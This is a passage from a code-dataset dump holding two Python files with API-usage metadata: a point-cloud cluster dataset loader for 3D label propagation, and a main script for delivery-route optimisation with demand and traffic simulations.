"usage_type": "call"}, {"api_name": "graphics.image", "line_number": 126, "usage_type": "attribute"}, {"api_name": "path.Path.read_path_file", "line_number": 134, "usage_type": "call"}, {"api_name": "path.Path", "line_number": 134, "usage_type": "name"}, {"api_name": "graphics.paths", "line_number": 135, "usage_type": "attribute"}, {"api_name": "path.create_path_geometry", "line_number": 137, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 140, "usage_type": "call"}, {"api_name": "model.read_model_file", "line_number": 141, "usage_type": "call"}, {"api_name": "model.create_model_geometry", "line_number": 142, "usage_type": "call"}, {"api_name": "graphics.model", "line_number": 143, "usage_type": "attribute"}, {"api_name": "graphics.auto_slice", "line_number": 146, "usage_type": "call"}, {"api_name": "graphics.show", "line_number": 149, "usage_type": "call"}]} +{"seq_id": "71189582046", "text": "import numpy as np \nimport torch \nimport os \nimport os.path as osp \nfrom utils.slam import *\ntry:\n from torchsparse.utils.quantize import sparse_quantize\n def grid_subsample(accumulated_pointcloud,accumulated_confidence,vox_size):\n _, indices = sparse_quantize(accumulated_pointcloud[:,:3], vox_size,return_index=True)\n accumulated_pointcloud = accumulated_pointcloud[indices]\n accumulated_confidence = accumulated_confidence[indices]\n return accumulated_pointcloud,accumulated_confidence\nexcept:\n import cpp_wrappers.cpp_subsampling.grid_subsampling as cpp_subsampling\n def grid_subsample(accumulated_pointcloud, accumulated_confidence, vox_size):\n _, fts, lbls = cpp_subsampling.subsample(accumulated_pointcloud[:,:3].astype(np.float32),\n features=np.hstack((accumulated_pointcloud,accumulated_confidence)).astype(np.float32),\n classes = accumulated_pointcloud[:,4].astype(np.int32).reshape(-1,1),\n sampleDl=vox_size,\n verbose=False)\n accumulated_pointcloud = fts[:,:-1]\n accumulated_pointcloud[:,4] = lbls.reshape(-1)\n accumulated_confidence = fts[:,-1].reshape(-1,1)\n return accumulated_pointcloud.astype(np.float64), accumulated_confidence.astype(np.float64)\nfrom cpp_wrappers.cpp_preprocess.propagation import compute_labels, cluster\nimport random\nfrom tqdm import tqdm\n\nclass InfiniteDataLoader(torch.utils.data.DataLoader):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # Initialize an iterator over the dataset.\n self.dataset_iterator = super().__iter__()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n try:\n batch = next(self.dataset_iterator)\n except StopIteration:\n # Dataset exhausted, use a new fresh iterator.\n self.dataset_iterator = super().__iter__()\n batch = next(self.dataset_iterator)\n return batch\n\nclass BalancedSampler(object):\n r\"\"\"Base class for all Samplers.\n\n Every Sampler subclass has to provide an __iter__ method, providing a way\n to iterate over indices of dataset elements, and a __len__ method that\n returns the length of the returned iterators.\n \"\"\"\n\n def __init__(self, data_source,n_label,shuffle=50000,batch_size=1):\n self.data_source = data_source #list of lists\n self.n_label = n_label\n self.reshuffle = shuffle\n self.batch_size=batch_size\n try:\n self.data_source = [ds.tolist() for ds in data_source]\n except:\n self.data_source = data_source\n\n def __iter__(self):\n lbl_curr = 0\n counter = [0 for _ in range(self.n_label)]\n c = 0\n self.data_source = [random.sample(ds,len(ds)) for ds in self.data_source]\n batch = []\n for _ in range(sum([len(ds) for ds in self.data_source])):\n if len(batch) == self.batch_size:\n yield batch\n batch = []\n batch.append(int(self.data_source[lbl_curr][counter[lbl_curr]]))\n counter[lbl_curr] = (counter[lbl_curr] + 1) % len(self.data_source[lbl_curr])\n if counter[lbl_curr] == 0:\n self.data_source[lbl_curr] = random.sample(self.data_source[lbl_curr],len(self.data_source[lbl_curr]))\n lbl_curr = (lbl_curr + 1) % self.n_label\n c += 1\n if c == self.reshuffle:\n self.data_source = [random.sample(ds,len(ds)) for ds in self.data_source]\n counter = [0 for _ in range(self.n_label)]\n c = 0\n\n def __len__(self):\n raise NotImplementedError\n\nclass ClusterDataset(torch.utils.data.Dataset):\n\n def __init__(self, config, dataset):\n self.config = config \n self.dataset = dataset \n self.cluster_path = osp.join(self.config.cluster.path,self.config.source,self.config.cluster.name)\n self.n_label = self.dataset.get_n_label()\n self.generate_dataset()\n print(\"Cluster dataset \"+self.dataset.split+\" created.\")\n self.get_weight()\n print(\"Data information for \"+self.dataset.split+\" created. Loader ready.\")\n\n def __len__(self):\n return len(self.datalist) \n\n def get_class_names(self):\n return self.dataset.label_names\n\n def __getitem__(self, index):\n index = int(self.datalist[index,-1])\n seq = index//(self.n_clust_max*self.size_seq_max)\n scan = (index-seq*self.n_clust_max*self.size_seq_max)//self.n_clust_max\n cluster_number = index%self.n_clust_max\n return self.get_cluster(seq,scan,cluster_number)\n\n def get_cluster(self,seq_number,frame_number,cluster_number):\n try:\n return np.fromfile(osp.join(self.cluster_path,self.dataset.sequence[seq_number],str(frame_number)+'_'+str(cluster_number)+'.bin'),dtype=np.float32).reshape(-1,6)\n except:\n #return None\n raise NameError(\"Cluster : \" + str(self.dataset.sequence[seq_number]) + \"_\" + str(frame_number)+ \"_\" + str(cluster_number) + \" not found\")\n\n def get_dataset(self):\n self.size_seq_max = max([self.dataset.get_size_seq(s) for s in range(len(self.dataset.sequence))])\n self.n_clust_max = self.config.cluster.n_centroids\n self.total = 0\n for seq in self.dataset.sequence:\n seq_path = osp.join(self.cluster_path, seq) \n self.total += len(list(os.listdir(seq_path)))\n\n\n def get_weight(self):\n self.init_weight()\n self.class_frames = []\n self.datalist = self.datalist[np.logical_and(np.sum(self.datalist[:,:-1],axis=1)<20000,np.sum(self.datalist[:,:-1],axis=1)>100)]\n for i in range(self.n_label):\n integer_inds = np.where(self.datalist[:, i]>10)[0]\n self.class_frames.append(integer_inds.astype(np.int64))\n self.class_frames[i] = np.random.permutation(self.class_frames[i])\n\n class_proportions = np.sum(self.datalist[:,:-1],axis=0)\n self.w = 1/(100*class_proportions/np.sum(class_proportions))\n self.w[self.w<0.05] = 0.05\n self.w[self.w>50] = 50\n\n\n def init_weight(self):\n seq_stat_file = osp.join(self.cluster_path, self.dataset.split,'weight_stats_cluster.npy')\n if osp.exists(seq_stat_file):\n with open(seq_stat_file, 'rb') as f:\n self.datalist = np.load(f)\n self.total = len(self.datalist)\n self.n_clust_max = self.config.cluster.n_centroids\n self.size_seq_max = max([self.dataset.get_size_seq(s) for s in range(len(self.dataset.sequence))]) \n else:\n self.get_dataset()\n self.datalist = np.zeros((self.total, self.n_label+1))\n os.makedirs(osp.join(self.cluster_path, self.dataset.split),exist_ok=True)\n i = 0\n for s in range(len(self.dataset.sequence)):\n for k in range(self.dataset.get_size_seq(s)):\n for l in range(self.config.cluster.n_centroids):\n clust = self.get_cluster(s,k,l)\n if clust is None:\n continue\n unique, counts = np.unique(clust[clust[:,4] != -1,4], return_counts=True)\n idx = self.n_clust_max*self.size_seq_max*s + self.n_clust_max*k + l\n self.datalist[i,unique.astype(np.int32)] = counts\n self.datalist[i,-1] = idx\n i+=1\n np.save(seq_stat_file, self.datalist)\n\n def generate_dataset(self):\n for i in tqdm(range(len(self.dataset.sequence)),desc=\"Processing dataset \"+str(self.config.source)):\n self.generate_sequence(i)\n\n def generate_sequence(self,seq_number):\n if osp.exists(osp.join(self.cluster_path,self.dataset.sequence[seq_number])):\n return True \n os.makedirs(osp.join(self.cluster_path,self.dataset.sequence[seq_number]),exist_ok=True)\n\n #init accumulated arrays\n accumulated_pointcloud = np.empty((0,6)).astype(np.float64)\n accumulated_confidence = np.empty(0, dtype=np.float64)\n\n #get slam poses\n rot, trans = self.dataset.get_poses_seq(seq_number)\n\n #get sequence information\n len_seq = self.dataset.get_size_seq(seq_number)\n seq = self.dataset.sequence[seq_number]\n \n #accumulate\n lastIndex = 1\n local_limit = self.config.sequence.limit_GT_time\n start = [i for i in range(self.config.subsample)]\n for st in start:\n for frame in tqdm(range(st,len_seq,len(start)),leave=False,desc=\"Sequence: \" + str(self.dataset.sequence[seq_number]) + \", subsample number \" +str(st+1)+\"/\"+str(len(start))):\n if frame>st:\n #Check if the sensor moved more than min_dist_mvt\n if np.linalg.norm(local_trans - trans[frame-lastIndex]) < self.config.sequence.min_dist_mvt:\n accumulated_pointcloud = accumulated_pointcloud[:-len(pointcloud)]\n accumulated_confidence = accumulated_confidence[:-len(pointcloud)]\n local_limit += 1\n lastIndex += 1\n else:\n lastIndex =1\n\n #voxelize the past sequence and remove old points\n if len(accumulated_pointcloud) > 0:\n accumulated_pointcloud, accumulated_confidence = grid_subsample(accumulated_pointcloud, accumulated_confidence, self.config.sequence.subsample)\n accumulated_confidence = accumulated_confidence[accumulated_pointcloud[:,-1] > frame - local_limit]\n accumulated_pointcloud = accumulated_pointcloud[accumulated_pointcloud[:,-1] > frame - local_limit]\n\n pointcloud, label = self.dataset.loader(seq,frame)\n\n #discard information beyond a certain distance\n if self.config.sequence.out_lim>0:\n norm_curr = np.linalg.norm(pointcloud[:,:3],axis=1)\n pointcloud = pointcloud[norm_curr0:\n center_current = np.mean(pointcloud[:,:2],axis=0)\n norm_acc = np.linalg.norm(accumulated_pointcloud[:,:2]-center_current,axis=1)\n accumulated_pointcloud = accumulated_pointcloud[norm_acc (len(acc_label) - len(label))]\n acc_label[dynamic_current] = -1\n\n clusters = cluster(accumulated_pointcloud, acc_label, len(pointcloud), self.config.cluster.voxel_size, self.config.cluster.n_centroids, 'Kmeans')\n\n clusters = list(filter(lambda e: len(e)>1,clusters))\n clusters = [np.array(c) for c in clusters]\n accumulated_pointcloud[:,4] = acc_label\n pointcloud[:,4] = accumulated_pointcloud[-len(pointcloud):,4]\n\n accumulated_pointcloud[-len(pointcloud):,4] = label\n accumulated_confidence[-len(pointcloud):] = 1\n #save\n for c in range(len(clusters)):\n accumulated_pointcloud[clusters[c]].astype(np.float32).tofile(osp.join(self.cluster_path,seq,str(frame)+'_'+str(c)+'.bin'),format='float32')\n\n", "repo_name": "JulesSanchez/3DLabelProp", "sub_path": "datasets/cluster_dataset.py", "file_name": "cluster_dataset.py", "file_ext": "py", "file_size_in_byte": 12796, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torchsparse.utils.quantize.sparse_quantize", "line_number": 9, "usage_type": "call"}, {"api_name": "cpp_wrappers.cpp_subsampling.grid_subsampling.subsample", "line_number": 16, "usage_type": "call"}, {"api_name": "cpp_wrappers.cpp_subsampling.grid_subsampling", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.utils", "line_number": 29, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 69, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 78, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "name"}, {"api_name": "numpy.fromfile", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 137, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path", "line_number": 147, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 155, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 169, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 176, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 181, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 182, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 217, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 230, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 237, "usage_type": "attribute"}, {"api_name": "cpp_wrappers.cpp_preprocess.propagation.compute_labels", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 241, "usage_type": "call"}, {"api_name": "cpp_wrappers.cpp_preprocess.propagation.cluster", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 256, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 256, "usage_type": "call"}, {"api_name": "os.path", "line_number": 256, "usage_type": "name"}]} +{"seq_id": "22046569853", "text": "\"\"\"Main file to be run\"\"\"\n\n## Imports\nfrom Code import dataInput, routing, linearProgram\n\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\nfrom matplotlib import pyplot as plt\n\nfrom typing import List, Dict, Tuple\n\n#--------------------------------------------------------------------------------------------\n# Global Variables\n#--------------------------------------------------------------------------------------------\nsettings = dataInput.readRoutes(\"settings.json\") # global settings file\n\ntravelDurations = dataInput.readTravelDurations()\ncoordinates = dataInput.readStoreCoordinates()\n\ndepot = \"Distribution Centre Auckland\"\nrouteFinder = routing.Pathfinder(travelDurations)\n\n#--------------------------------------------------------------------------------------------\n# Local Helper Functions\n#--------------------------------------------------------------------------------------------\n\ncost = lambda duration: 225*duration + 50*max(0, duration-4)\n\nclass LP_NOT_OPTIMAL(Exception):\n def __init__(self, message: str):\n self.message = message\n super().__init__(self.message)\n\ndef calculateDuration(route: List[str], demands: Dict[str, float], multiplier: float = 1.0):\n \"\"\"Calculates the duration for a route given the demands (durations are assumed to be global)\"\"\"\n ans = 0\n for i in range(len(route)-1):\n ans += travelDurations[route[i]][route[i+1]]*multiplier\n ans += 0.125*demands[route[i+1]]\n\n return round(ans + travelDurations[route[-1]][depot]*multiplier, 3)\n\n#--------------------------------------------------------------------------------------------\n# Initial Solution Generation\n#--------------------------------------------------------------------------------------------\n\ndef getRoutes(regionalDemands: Dict[str, float], removeOutliers: float = 1, maxStops: int = 6):\n \"\"\"Function to generate valid routes given the demands for a region on a specified day.\"\"\"\n \n regionRoutingObj = routing.Region(nodes=regionalDemands, locations=coordinates)\n\n validSubgraphs = regionRoutingObj.findValidSubgraphs(removeOutliers=removeOutliers, maxStops=maxStops)\n \n routes = []\n for k in validSubgraphs:\n for route in validSubgraphs[k]:\n solution = routeFinder.nearestNeighbour([depot] + route)\n routes.append(solution[solution.index(depot):] + solution[:solution.index(depot)])\n\n return routes\n\ndef eliminatePoorRoutes(routes, demands, minLenToKeep: int = 2, maxDuration: float = 6.0):\n \"\"\"Eliminates routes up to a certain length.\"\"\"\n durations = [calculateDuration(route, demands) for route in routes] # ignore traffic multiplier\n\n newRoutes = [routes[i] for i in range(len(durations)) if durations[i] < maxDuration or len(routes[i]) <= minLenToKeep]\n return newRoutes\n\ndef findInitalSolution(day: str, demands: Dict[str, float], locations: Dict[str,List[str]], \n centroid_mean_ratio: float, max_stores: int, traffic_multiplier: float,\n min_route_length: int, max_duration: float, lpDisplay: bool):\n \"\"\"Finds the solutions for a given day...\"\"\"\n \n # demands = dataInput.readAverageDemands(roundUp=True)\n # locations = dataInput.readLocationGroups()\n\n \n solution = {}\n solutionStatus = True\n\n for region in locations.keys():\n regionalDemands = {location: demands[day][location] for location in locations[region] if demands[day][location] > 0}\n\n routes = getRoutes(regionalDemands, removeOutliers=centroid_mean_ratio, maxStops=max_stores)\n routes = eliminatePoorRoutes(routes, regionalDemands, minLenToKeep=min_route_length, maxDuration=max_duration)\n stores = regionalDemands.keys()\n durations = [calculateDuration(route, regionalDemands, multiplier=traffic_multiplier) for route in routes]\n\n regionalSolution, problemStatus = linearProgram.findBestPartition(day, region, routes, stores, durations, disp=lpDisplay)\n \n solution[region] = regionalSolution\n solutionStatus = solutionStatus and problemStatus\n \n return solution, solutionStatus\n\n\n## Traffic and demand simulations\n#--------------------------------------------------------------------------------------------\n# Traffic and Demand Simulations\n#--------------------------------------------------------------------------------------------\ndef generateDemands(demands: pd.DataFrame, day: str, sampleSize: int=1000):\n simDemands = {shop: [] for shop in demands.index}\n \n for shop in demands.index:\n if day == \"WeekdayAvg\":\n simDemands[shop] = stats.norm.rvs(loc=demands[\"Demand\"][shop], scale=demands[\"std\"][shop], size=sampleSize)\n elif day == \"Saturday\":\n simDemands[shop] = stats.uniform.rvs(loc=demands[\"min\"][shop],scale=demands[\"max\"][shop] - demands[\"min\"][shop], size=sampleSize)\n else:\n raise(\"Invalid day supplied\") \n \n return simDemands\n\ndef checkRoute(demands, routes):\n \"\"\"\n needs to check demand and split the route if needed\n\n ...\n \"\"\"\n newRoutes = []\n # going through each route and checking the demand\n for route in routes: \n # cDemand stores the demand of the current \"subroute\", j the start of the subroute\n cDemand, j = 0, 1 \n tempRoutes = []\n for i in range(1,len(route)):\n cDemand += demands[route[i]]\n if cDemand > 26: # we split the route and start a new subroute\n tempRoutes.append([depot]+route[j:i])\n cDemand, j = demands[route[i]], i\n else: # adding on the remaining portion of the route \n if route[j:]:\n tempRoutes.append([depot]+route[j:])\n\n newRoutes.extend(tempRoutes)\n return newRoutes\n\ndef runSimulationInstance(demands: pd.DataFrame, routes: List[List[str]], trafficMultiplier: float, trafficStd: float = 0.1, simulationNumber: int = 1000):\n # demands = pd.DataFrame.from_dict(generateDemandsWeekday(), orient='index')\n newRoutes = []\n routeLengths = []\n routeDurations = []\n routeCosts = []\n\n # print(\"Running weekday 8-12\")\n for i in range(simulationNumber):\n multiplier = stats.norm.rvs(loc=trafficMultiplier, scale=trafficStd)\n curCost = 0\n curDur = 0\n\n # splitting the routes to account for new demands \n tempRoutes = checkRoute(demands.loc[:,i], routes=routes)\n\n routeLengths.append(len(tempRoutes))\n newRoutes.append(tempRoutes)\n \n for route in tempRoutes:\n tempDuration = calculateDuration(route, demands.loc[:,i], multiplier=multiplier)\n curDur += tempDuration\n curCost += cost(tempDuration)\n\n # assert(checkSolutionIsPartition(tempRoutes))\n routeCosts.append(curCost)\n routeDurations.append(curDur/routeLengths[-1])\n\n tempRoutes = [x for _, x in sorted(zip(routeCosts, newRoutes))]\n \n resRoutes = {\n \"lower\": tempRoutes[25],\n \"median\": tempRoutes[500],\n \"upper\": tempRoutes[975]\n }\n\n statistics = {\n \"lengths\": [x for _,x in sorted(zip(routeCosts,routeLengths))], \n \"durations\": [x for _,x in sorted(zip(routeCosts,routeDurations))], \n \"costs\": sorted(routeCosts)\n }\n\n return resRoutes, statistics\n\n## Store closure simulations\n#--------------------------------------------------------------------------------------------\n# Store Closure Simulations\n#--------------------------------------------------------------------------------------------\n\n# nothing to see here...\n\n## Main control functions\n#--------------------------------------------------------------------------------------------\n# Main Control Functions\n#--------------------------------------------------------------------------------------------\n\ndef initialOptimisation(days: List[str] = [\"WeekdayAvg\", \"Saturday\"]):\n localSettings = settings[\"inital_solution\"][\"run_args\"]\n\n\n demands = dataInput.readAverageDemands(roundUp=localSettings[\"round_up\"])\n locations = dataInput.readLocationGroups()\n\n solutions = {}\n for day in days:\n solutions[day] = []\n\n temp, solStatus = findInitalSolution(day, demands, locations, \n centroid_mean_ratio=localSettings[\"centroid_mean_ratio\"], \n max_stores=localSettings[\"max_stores\"][day], \n traffic_multiplier=localSettings[\"traffic_multiplier\"], \n min_route_length=localSettings[\"min_route_length\"], \n max_duration=localSettings[\"max_duration\"][day],\n lpDisplay=localSettings[\"display_lp_output\"])\n \n if not solStatus:\n raise LP_NOT_OPTIMAL(f\"\\033[93mThe solution for {day} was not optimal\\033[0m\")\n\n for region in temp: # constructing a list of all routes for the day\n solutions[day].extend(temp[region])\n \n return solutions\n\ndef simulateUncertainty(initialSolutions: Dict[str, List[str]], days: List[str] = [\"WeekdayAvg\", \"Saturday\"], periods: List[str] = [\"morning\",\"evening\"]):\n\n if any([day not in [\"WeekdayAvg\", \"Saturday\"] for day in days]): \n raise(\"There is currently no implementation for days other than 'WeekdayAvg' and 'Saturday'.\")\n\n localSettings = settings[\"uncertainty_simulation\"][\"run_args\"]\n\n demands = {\n \"WeekdayAvg\": dataInput.readDataWithStats(roundUp=localSettings[\"round_up\"]), \n \"Saturday\": dataInput.readSaturdayWithStats(roundUp=localSettings[\"round_up\"])\n }\n \n simulationResults = {}\n for day in days:\n dayDemands = generateDemands(demands[day], day)\n dayDemands = pd.DataFrame.from_dict(dayDemands, orient='index')\n\n dayResults = {}\n for i in range(len(periods)):\n newRoutes, statistics = runSimulationInstance(demands=dayDemands, routes=initialSolutions[day], \n trafficMultiplier=localSettings[\"traffic_multipliers\"][day][i], \n trafficStd=localSettings[\"traffic_std\"],\n simulationNumber=localSettings[\"simulation_size\"])\n \n periodResults = {}\n periodResults[\"routes\"] = newRoutes\n periodResults[\"statistics\"] = statistics\n \n dayResults[periods[i]] = periodResults\n\n simulationResults[day] = dayResults\n\n\n\n return simulationResults\n\ndef simulateStoreClosures(days: List[str] = [\"WeekdayAvg\", \"Saturday\"]):\n localSettings = settings[\"store_closures\"][\"run_args\"]\n\n demands = dataInput.readDemandsWithStoreClosure(toClose=localSettings[\"stores_to_close_and_keep\"], \n transferRatio=localSettings[\"transfer_ratio\"],\n roundUp=localSettings[\"round_up\"])\n locations = dataInput.readLocationGroupsWithStoreClosure(toClose=localSettings[\"stores_to_close_and_keep\"]) \n \n solutions = {}\n for day in days:\n solutions[day] = []\n\n temp, solStatus = findInitalSolution(day, demands, locations, \n centroid_mean_ratio=localSettings[\"centroid_mean_ratio\"], \n max_stores=localSettings[\"max_stores\"][day], \n traffic_multiplier=localSettings[\"traffic_multiplier\"], \n min_route_length=localSettings[\"min_route_length\"], \n max_duration=localSettings[\"max_duration\"][day],\n lpDisplay=localSettings[\"display_lp_output\"])\n \n if not solStatus:\n raise LP_NOT_OPTIMAL(f\"\\033[93mThe solution for {day} was not optimal\\033[0m\")\n\n for region in temp: # constructing a list of all routes for the day\n solutions[day].extend(temp[region])\n \n return solutions\n\n#--------------------------------------------------------------------------------------------\n# Main Function\n#--------------------------------------------------------------------------------------------\n\ndef main():\n np.random.seed(508)\n # yes this could be a for loop...\n\n # initial solutions\n if settings[\"inital_solution\"][\"run\"]:\n msg = \"Running Initial Solution:\"\n print(f\"\\n\\t{msg}\\n\\t{'_'*len(msg)}\\n\")\n \n initialResults = initialOptimisation()\n \n if settings[\"inital_solution\"][\"save\"]:\n dataInput.storeRoutes(initialResults, fileAddress=\"Solutions/initialRoutes.json\") \n else:\n initialResults = dataInput.readRoutes(\"Solutions/initialRoutes.json\")\n\n if settings[\"inital_solution\"][\"plot\"]:\n msg = \"Displaying Initial Results:\"\n print(f\"\\n\\t{msg}\\n\\t{'_'*len(msg)}\\n\")\n\n demands = dataInput.readAverageDemands(roundUp=settings[\"inital_solution\"][\"run_args\"][\"round_up\"])\n\n for day in initialResults.keys():\n print(f\"\\n\\t\\t{day}:\\n\\t\\t{'-'*(len(day)+1)}\\n\")\n\n durations = [calculateDuration(route, demands[day], settings[\"inital_solution\"][\"run_args\"][\"traffic_multiplier\"]) for route in initialResults[day]]\n costs = [cost(dur) for dur in durations]\n\n print(f\"Total Cost:\\t\\t{sum(costs):.3f}\")\n print(f\"Average Duration:\\t{sum(durations)/len(durations):.3f}\")\n print(f\"Number of Trucks:\\t{len(durations)}\\n\")\n\n # uncertainty simulations\n if settings[\"uncertainty_simulation\"][\"run\"]:\n simulationResults = simulateUncertainty(initialSolutions=initialResults)\n\n if settings[\"uncertainty_simulation\"][\"save\"]:\n dataInput.storeRoutes(simulationResults, fileAddress=\"Solutions/simulationResults.json\") \n else:\n simulationResults = dataInput.readRoutes(\"Solutions/simulationResults.json\")\n\n if settings[\"uncertainty_simulation\"][\"plot\"]:\n msg = \"Displaying Simulation Results:\"\n print(f\"\\n\\t{msg}\\n\\t{'_'*len(msg)}\\n\")\n\n demands = dataInput.readAverageDemands(roundUp=settings[\"uncertainty_simulation\"][\"run_args\"][\"round_up\"])\n\n for day in simulationResults.keys():\n print(f\"\\n\\t\\t{day}:\\n\\t\\t{'-'*(len(day)+1)}\\n\")\n\n multipliers = settings[\"uncertainty_simulation\"][\"run_args\"][\"traffic_multipliers\"][day]\n # maybe not the right term?\n for period in simulationResults[day]:\n print(f\"\\n{period}:\\n{'-'*(len(period)+1)}\\n\")\n period_multiplier = multipliers[0] if period == \"morning\" else multipliers[1]\n \n tempData = simulationResults[day][period][\"statistics\"]\n\n \n\n keys = {# quick fix\n \"lower\":25,\n \"median\":500,\n \"upper\":975\n }\n for measure in simulationResults[day][period][\"routes\"]:\n print(f\"\\n{measure}:\\n\")\n \n\n print(f\"Total Cost:\\t\\t{tempData['costs'][keys[measure]]:.3f}\")\n print(f\"Average Duration:\\t{tempData['durations'][keys[measure]]:.3f}\")\n print(f\"Number of Trucks:\\t{tempData['lengths'][keys[measure]]}\\n\")\n\n \n msg = \"Statistics:\"\n print(f\"{msg}\")\n\n print(f\"Average Cost:\\t\\t\\t{np.mean(tempData['costs']):.3f}\")\n print(f\"Average Duration:\\t\\t{np.mean(tempData['durations']):.3f}\")\n print(f\"Average Number of Trucks:\\t{np.mean(tempData['lengths'])}\\n\")\n\n\n # resolving with store closures\n if settings[\"store_closures\"][\"run\"]:\n storeClosureResults = simulateStoreClosures()\n\n if settings[\"store_closures\"][\"save\"]:\n dataInput.storeRoutes(storeClosureResults, fileAddress=\"Solutions/storeClosureSolutions.json\") \n else:\n storeClosureResults = dataInput.readRoutes(\"Solutions/storeClosureSolutions.json\")\n\n if settings[\"store_closures\"][\"plot\"]:\n msg = \"Displaying Store Closure Results:\"\n print(f\"\\n\\t{msg}\\n\\t{'_'*len(msg)}\\n\")\n\n demands = dataInput.readDemandsWithStoreClosure(toClose=settings[\"store_closures\"][\"run_args\"][\"stores_to_close_and_keep\"],\n transferRatio=settings[\"store_closures\"][\"run_args\"][\"transfer_ratio\"],\n roundUp=settings[\"store_closures\"][\"run_args\"][\"round_up\"])\n\n for day in storeClosureResults.keys():\n print(f\"\\n\\t\\t{day}:\\n\\t\\t{'-'*(len(day)+1)}\\n\")\n\n durations = [calculateDuration(route, demands[day], settings[\"store_closures\"][\"run_args\"][\"traffic_multiplier\"]) for route in storeClosureResults[day]]\n costs = [cost(dur) for dur in durations]\n\n print(f\"Total Cost:\\t\\t{sum(costs):.3f}\")\n print(f\"Average Duration:\\t{sum(durations)/len(durations):.3f}\")\n print(f\"Number of Trucks:\\t{len(durations)}\\n\")\n return\n\n\n\nif __name__ == \"__main__\":\n # demands = dataInput.readAverageDemands()\n # for route in routes:\n # duration = calculateDuration(route, demands)\n # tempcost = cost(duration)\n\n\n main()\n # data = dataInput.readRoutes(\"simulationResults.json\")\n # routes = data[\"WeekdayAvg\"][\"morning\"][\"routes\"][\"lower\"]\n # print(routes)\n # demands = dataInput.readAverageDemands()\n # for route in routes:\n # duration = calculateDuration(route,demands[\"WeekdayAvg\"])\n # tempcost = cost(duration)\n # print(tempcost)\n\n", "repo_name": "NicholasLee-ENGSCI/https-github.com-NicholasLee-ENGSCI-tab-repositories", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 18026, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", 